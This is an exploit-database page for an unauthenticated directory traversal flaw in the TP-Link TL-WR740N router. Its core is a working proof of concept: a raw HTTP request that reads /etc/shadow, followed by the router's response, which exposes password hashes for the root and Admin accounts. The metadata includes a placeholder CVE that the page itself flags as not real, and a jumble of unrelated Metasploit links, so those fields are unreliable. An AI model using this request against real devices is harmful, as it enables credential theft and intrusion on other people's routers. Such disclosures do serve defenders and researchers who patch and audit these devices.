header-logo
Suggest Exploit
vendor:
TL-WR740N
by:
Syed Affan Ahmed (ZEROXINN)
6.1
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: TL-WR740N
Affected Version From: 3.12.2011
Affected Version To: 3.12.11
Patch Exists: NO
Related CWE: CVE-2023-XXXX (Not an actual CVE, placeholder)
CPE: h:tp-link:tl-wr740n_firmware:3.12.11
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2024-1597/https://www.rapid7.com/db/vulnerabilities/mediawiki-cve-2024-23174/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-43358/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-RHEL9-unaffected/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23504/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-RHEL8-unaffected/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-14723/https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2017-14723/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/red_hat-jboss_eap-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/suse-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2017-9788/https://www.rapid7.com/db/?q=placeholder)&type=&page=2https://www.rapid7.com/db/?q=placeholder)&type=&page=2
Other Scripts:
Platforms Tested: TP-Link TL-WR740N
2023

TP-Link TL-WR740N Unauthenticated Directory Traversal

The exploit allows an unauthenticated user to traverse directories and access sensitive system files like /etc/shadow on TP-Link TL-WR740N version 3.12.11 Build 110915 Rel.40896n. This vulnerability could lead to unauthorized access to critical system information.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the affected directories and implement proper access controls. Regularly updating to the latest firmware provided by the vendor is also advised.
Source

Exploit-DB raw data:

# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

---------------------------POC---------------------------

Request
-------

GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ipaddr=192.168.0.100; mLangage=žée; exception=4
Connection: close

Response
--------

HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

Navigation

Suggest Exploit

Services By CQR

cqrsecured